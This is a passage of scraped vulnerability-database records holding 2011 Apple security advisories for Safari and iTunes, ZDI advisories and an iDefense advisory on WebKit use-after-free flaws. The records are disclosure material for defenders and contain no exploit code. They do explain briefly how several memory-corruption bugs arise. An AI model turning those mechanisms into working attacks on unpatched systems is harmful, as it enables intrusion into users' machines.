Keen\r\nCVE-2011-0254 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0255 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\r\nCVE-2011-0983 : Martin Barbella\r\nCVE-2011-1109 : Sergey Glazunov\r\nCVE-2011-1114 : Martin Barbella\r\nCVE-2011-1115 : Martin Barbella\r\nCVE-2011-1117 : wushi of team509\r\nCVE-2011-1121 : miaubiz\r\nCVE-2011-1188 : Martin Barbella\r\nCVE-2011-1203 : Sergey Glazunov\r\nCVE-2011-1204 : Sergey Glazunov\r\nCVE-2011-1288 : Andreas Kling of Nokia\r\nCVE-2011-1293 : Sergey Glazunov\r\nCVE-2011-1296 : Sergey Glazunov\r\nCVE-2011-1449 : Marek Majkowski, wushi of team 509 working with\r\niDefense VCP\r\nCVE-2011-1451 : Sergey Glazunov\r\nCVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-1457 : John Knottenbelt of Google\r\nCVE-2011-1462 : wushi of team509\r\nCVE-2011-1797 : wushi of team509\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A configuration issue existed in WebKit's use of\r\nlibxslt. Visiting a maliciously crafted website may lead to arbitrary\r\nfiles being created with the privileges of the user, which may lead\r\nto arbitrary code execution. This issue is addressed through improved\r\nlibxslt security settings.\r\nCVE-ID\r\nCVE-2011-1774 : Nicolas Gregoire of Agarri\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\ninformation disclosure\r\nDescription: A cross-origin issue existed in the handling of Web\r\nWorkers. Visiting a maliciously crafted website may lead to an\r\ninformation disclosure.\r\nCVE-ID\r\nCVE-2011-1190 : Daniel Divricean of divricean.ro\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of URLs\r\nwith an embedded username. Visiting a maliciously crafted website may\r\nlead to a cross-site scripting attack. This issue is addressed\r\nthrough improved handling of URLs with an embedded username.\r\nCVE-ID\r\nCVE-2011-0242 : Jobert Abma of Online24\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of DOM\r\nnodes. Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack.\r\nCVE-ID\r\nCVE-2011-1295 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: A maliciously crafted website may be able to cause a\r\ndifferent URL to be shown in the address bar\r\nDescription: A URL spoofing issue existed in the handling of the DOM\r\nhistory object. A maliciously crafted website may have been able to\r\ncause a different URL to be shown in the address bar.\r\nCVE-ID\r\nCVE-2011-1107 : Jordi Chancel\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Subscribing to a maliciously crafted RSS feed and clicking\r\non a link within it may lead to an information disclosure\r\nDescription: A canonicalization issue existed in the handling of\r\nURLs. Subscribing to a maliciously crafted RSS feed and clicking on a\r\nlink within it may lead to arbitrary files being sent from the user's\r\nsystem to a remote server. This update addresses the issue through\r\nimproved handling of URLs.\r\nCVE-ID\r\nCVE-2011-0244 : Jason Hullinger\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Applications that use WebKit, such as mail clients, may\r\nconnect to an arbitrary DNS server upon processing HTML content\r\nDescription: DNS prefetching was enabled by default in WebKit.\r\nApplications that use WebKit, such a s mail clients, may connect to\r\nan arbitrary DNS server upon processing HTML content. This update\r\naddresses the issue by requiring applications to opt in to DNS\r\nprefetching.\r\nCVE-ID\r\nCVE-2010-3829 : Mike Cardwell of Cardwell IT Ltd.\r\n\r\n\r\nNote: Safari 5.1 is included with OS X Lion.\r\n\r\n\r\nSafari 5.1 and Safari 5.0.6 address the same set of security\r\nissues. Safari 5.1 is provided for Mac OS X v10.6,\r\nand Windows systems. Safari 5.0.6 is provided for\r\nMac OS X v10.5 systems.\r\n\r\nSafari 5.1 is available via the Apple Software Update\r\napplication, or Apple's Safari download site at:\r\nhttp://www.apple.com/safari/download/\r\n\r\nSafari 5.0.6 is available via the Apple Software Update\r\napplication, or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nSafari for Mac OS X v10.6.8 and later\r\nThe download file is named: Safari5.1SnowLeopard.dmg\r\nIts SHA-1 digest is: 2c3cef8e06c5aa586379b1a5fd5cf7b54e8acc24\r\n\r\nSafari for Mac OS X v10.5.8\r\nThe download file is named: Safari5.0.6Leopard.dmg\r\nIts SHA-1 digest is: ea970375d2116a7b74094a2a7669bebc306b6e6f\r\n\r\nSafari for Windows 7, Vista or XP\r\nThe download file is named: SafariSetup.exe\r\nIts SHA-1 digest is: d00b791c694b1ecfc22d6a1ec9aa21cc14fd8e36\r\n\r\nSafari for Windows 7, Vista or XP from the Microsoft Choice Screen\r\nThe download file is named: Safari_Setup.exe\r\nIts SHA-1 digest is: ccb3bb6b06468a430171d9f62708a1a6d917f45b\r\n\r\nSafari+QuickTime for Windows 7, Vista or XP\r\nThe file is named: SafariQuickTimeSetup.exe\r\nIts SHA-1 digest is: 1273e0ee742a294d65e4f25a9b3e36f79fb517c9\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.9 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOJI45AAoJEGnF2JsdZQeezHQIALKZms5tzYgYxUSdxmo+DmYw\r\nup9gAmEVcltZvCeVS1lUxfjqnRiGRSWyuou8Ynt9PfGQCz9GfLvzlrCHc5rsnKaD\r\nMeYY1IH7lQc6aqmV0hwb4nUL5qJntP6G5Ai0E/0UiRQNC/ummS+qnmdsiFo78ODY\r\nnKaB5cAWhqGHgOAPnUG0JwmxpYgR2HEtGYJSqlYykMwt1vnlAr5hHVNaUJcJ3Hlb\r\nvesN6fB7zQMiJVo8+iJBixCvIYlbII5HnVAmD1ToyKgENg4Iguo46YBMVr8DPgF/\r\nKD2s0+VF/O4utYVX0GiRGReVyq1PMvz/HI23ym8U3LjbezXD/AALQET0Q2hUEYQ=\r\n=fOfF\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26666", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26666", "title": "APPLE-SA-2011-07-20-1 Safari 5.1 and Safari 5.0.6", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "description": "WebKit and Apple libraries multiple security vulnerabilities", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:VULN:11798", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11798", "title": "WebKit / Apple Safari / Google Chrome multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-10-11-1 iTunes 10.5\r\n\r\niTunes 10.5 is now available and addresses the following:\r\n\r\nCoreFoundation\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack may lead to an unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\nstring tokenization. This issue does not affect OS X Lion systems.\r\nFor Mac OS X v10.6 systems, this issue is addressed in Security\r\nUpdate 2011-006.\r\nCVE-ID\r\nCVE-2011-0259 : Apple\r\n\r\nColorSync\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution\r\nDescription: An integer overflow existed in the handling of images\r\nwith an embedded ColorSync profile, which may lead to a heap buffer\r\noverflow. Opening a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0200 : binaryproof working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreAudio\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Playing maliciously crafted audio content may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in the handling of audio\r\nstream encoded with the advanced audio code. This issue does not\r\naffect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreMedia\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in the handling of H.264\r\nencoded movie files. For OS X Lion systems, this issue is addressed\r\nin OS X Lion v10.7.2. For Mac OS X v10.6 systems, this issue is\r\naddressed in Security Update 2011-006.\r\nCVE-ID\r\nCVE-2011-3219 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. This issue does not affect OS X Lion systems. For Mac OS\r\nX v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A reentrancy issue existed in ImageIO's handling of\r\nTIFF images. This issue does not affect Mac OS X systems.\r\nCVE-ID\r\nCVE-2011-0215 : Juan Pablo Lopez Yacubian working with iDefense VCP\r\n\r\nWebKit\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack while browsing the iTunes Store\r\nvia iTunes may lead to an unexpected application termination or\r\narbitrary code execution.\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nCVE-ID\r\nCVE-2010-1823 : David Weston of Microsoft and Microsoft Vulnerability\r\nResearch (MSVR), wushi of team509, and Yong Li of Research In Motion\r\nLtd\r\nCVE-2011-0164 : Apple\r\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\r\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\r\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0223 : Jose A. Vazquez of spa-s3c.blogspot.com working with\r\niDefense VCP\r\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative\r\nCVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0234 : Rob King working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with iDefense VCP\r\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0237 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\r\nCVE-2011-0240 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0253 : Richard Keen\r\nCVE-2011-0254 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0255 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\r\nCVE-2011-0983 : Martin Barbella\r\nCVE-2011-1109 : Sergey Glazunov\r\nCVE-2011-1114 : Martin Barbella\r\nCVE-2011-1115 : Martin Barbella\r\nCVE-2011-1117 : wushi of team509\r\nCVE-2011-1121 : miaubiz\r\nCVE-2011-1188 : Martin Barbella\r\nCVE-2011-1203 : Sergey Glazunov\r\nCVE-2011-1204 : Sergey Glazunov\r\nCVE-2011-1288 : Andreas Kling of Nokia\r\nCVE-2011-1293 : Sergey Glazunov\r\nCVE-2011-1296 : Sergey Glazunov\r\nCVE-2011-1440 : Jose A. Vazquez of spa-s3c.blogspot.com\r\nCVE-2011-1449 : Marek Majkowski\r\nCVE-2011-1451 : Sergey Glazunov\r\nCVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-1457 : John Knottenbelt of Google\r\nCVE-2011-1462 : wushi of team509\r\nCVE-2011-1797 : wushi of team509\r\nCVE-2011-2338 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2339 : Cris Neckar of the Google Chrome Security Team\r\nCVE-2011-2341 : Apple\r\nCVE-2011-2351 : miaubiz\r\nCVE-2011-2352 : Apple\r\nCVE-2011-2354 : Apple\r\nCVE-2011-2356 : Adam Barth and Abhishek Arya of Google Chrome\r\nSecurity Team using AddressSanitizer\r\nCVE-2011-2359 : miaubiz\r\nCVE-2011-2788 : Mikolaj Malecki of Samsung\r\nCVE-2011-2790 : miaubiz\r\nCVE-2011-2792 : miaubiz\r\nCVE-2011-2797 : miaubiz\r\nCVE-2011-2799 : miaubiz\r\nCVE-2011-2809 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-2811 : Apple\r\nCVE-2011-2813 : Cris Neckar of Google Chrome Security Team using\r\nAddressSanitizer\r\nCVE-2011-2814 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2815 : SkyLined of Google Chrome Security Team\r\nCVE-2011-2816 : Apple\r\nCVE-2011-2817 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2818 : Martin Barbella\r\nCVE-2011-2820 : Raman Tenneti and Philip Rogers of Google\r\nCVE-2011-2823 : SkyLined of Google Chrome Security Team\r\nCVE-2011-2827 : miaubiz\r\nCVE-2011-2831 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3232 : Aki Helin of OUSPG\r\nCVE-2011-3233 : Sadrul Habib Chowdhury of the Chromium development\r\ncommunity, Cris Neckar and Abhishek Arya (Inferno) of Google Chrome\r\nSecurity Team\r\nCVE-2011-3234 : miaubiz\r\nCVE-2011-3235 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3236 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3237 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3238 : Martin Barbella\r\nCVE-2011-3239 : Slawomir Blazek\r\nCVE-2011-3241 : Apple\r\nCVE-2011-3244 : vkouchna\r\n\r\nWebKit\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack may lead to arbitrary code\r\nexecution\r\nDescription: A configuration issue existed in WebKit's use of\r\nlibxslt. A man-in-the-middle attack while browsing the iTunes Store\r\nvia iTunes may lead to arbitrary files being created with the\r\nprivileges of the user, which may lead to arbitrary code execution.\r\nThis issue is addressed through improved libxslt security settings.\r\nCVE-ID\r\nCVE-2011-1774 : Nicolas Gregoire of Agarri\r\n\r\n\r\niTunes 10.5 may be obtained from:\r\nhttp://www.apple.com/itunes/download/\r\n\r\nFor Windows XP / Vista / Windows 7:\r\nThe download file is named: "iTunesSetup.exe"\r\nIts SHA-1 digest is: 1205cda4ce9a32db2fe02cf9f2cf2c0bf7d47bdb\r\n\r\nFor 64-bit Windows XP / Vista / Windows 7:\r\nThe download file is named: "iTunes64Setup.exe"\r\nIts SHA-1 digest is: ab400ad27a537613b3b5306ea026763a93d57fdf\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOlHiHAAoJEGnF2JsdZQee3qwH/0lwVfV3mYVgDxPYfnJlPVF/\r\n2LNjJjmafyNdzSoOOyL9bn5QZqdDlvHCkjgpsq+yX7//8bF/kN7qj3jNBh2qMFCa\r\ncTqIpRnJP5G1GwCdWCep6ZS9NNcv7pADcuoLrHJAHyFE+BlTSNJPkiD3noJiBBuQ\r\nj6CZl5If05rDY7fhspQ6zTlJ7NzzyTIrGM1aJXur2wawVhEALO56gb7+GzGeORax\r\nzU0Jafu9OL8naPfXOFRCvqGXyGBEW0VeWzGqaudDvui1LA5djp6B5AknuE4Xlotq\r\nfXPtwmylQ3B4OaBkoavqPI/UwKkQe0Bn/EsTHf4Pxeo+11CLwRg+JgLCanXRpqw=\r\n=12aV\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27156", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27156", "title": "APPLE-SA-2011-10-11-1 iTunes 10.5", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "description": "Multiple security vulnerabilities on different media formats parsing.", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:VULN:11974", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11974", "title": "Apple iTunes multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-240: Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-240\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-1453\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11273. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple Safari's Webkit. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the library's support of SVG markers.\r\nWhen updating a marker, the application will duplicate the reference of\r\nan object without updating its reference count. When freeing this\r\nobject, a use-after-free vulnerability can be made to occur. This can be\r\nleveraged by a remote attacker to execute code under the context of the\r\nuser running the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-01-21 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26756", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26756", "title": "ZDI-11-240: Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-239: Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-239\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0233\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple Safari Webkit. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the library's implementation of a\r\nFrameOwner element. When building this tree, the application will create\r\na duplicate reference of an element. By freeing the referenced element,\r\na use-after-free condition can be made to occur which can lead to code\r\nexecution under the context of the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-01-21 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26755", "title": "ZDI-11-239: Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "iDefense Security Advisory 07.20.11\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nJul 20, 2011\r\n\r\nI. BACKGROUND\r\n\r\nSafari is Apple's web browser, and is based on the open source WebKit\r\nbrowser engine. MobileSafari is Safari for Apple's mobile devices\r\nincluding the iPad and iPhone. For more information, see the vendor's\r\nsite found at the following link.\r\n\r\nhttp://www.apple.com/safari/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a memory corruption vulnerability in Apple Inc.'s\r\nSafari browser could allow an attacker to execute arbitrary code with\r\nthe privileges of the current user.\r\n\r\nSafari is Apple's Web browser and is based on the open source WebKit\r\nbrowser engine.\r\n\r\nThis vulnerability occurs when Safari incorrectly handles an error state\r\nwhen encountering a broken XHTML tag. Specifically, the tag enclosing\r\nthe tag being processed is freed and is then referenced after it has\r\nalready been freed. This can lead to the execution of arbitrary code.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability results in the execution of arbitrary\r\ncode with the privileges of the user viewing the Web page. To exploit\r\nthis vulnerability, a targeted user must load a malicious Web page\r\ncreated by an attacker. An attacker typically accomplishes this via\r\nsocial engineering or injecting content into compromised, trusted sites.\r\nAfter the user visits the malicious Web page, no further user\r\ninteraction is needed.\r\n\r\nIV. DETECTION\r\n\r\nSafari versions prior to 5.1 and 5.0.6 are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nDisabling JavaScript is an effective workaround for this vulnerability.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nApple Inc. has released patches which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://support.apple.com/kb/HT4808\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2011-0234 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n06/01/2011 Initial Vendor Notification\r\n06/01/2011 Initial Vendor Reply\r\n07/20/2011 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by wushi of team509.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright A\u00a9 2011 Verisign\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\ne-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26668", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26668", "title": "iDefense Security Advisory 07.20.11: Apple Safari innerText Use-After-Free Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "iDefense Security Advisory 07.20.11\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nJul 20, 2011\r\n\r\nI. BACKGROUND\r\n\r\nWebKit is an open source web browser 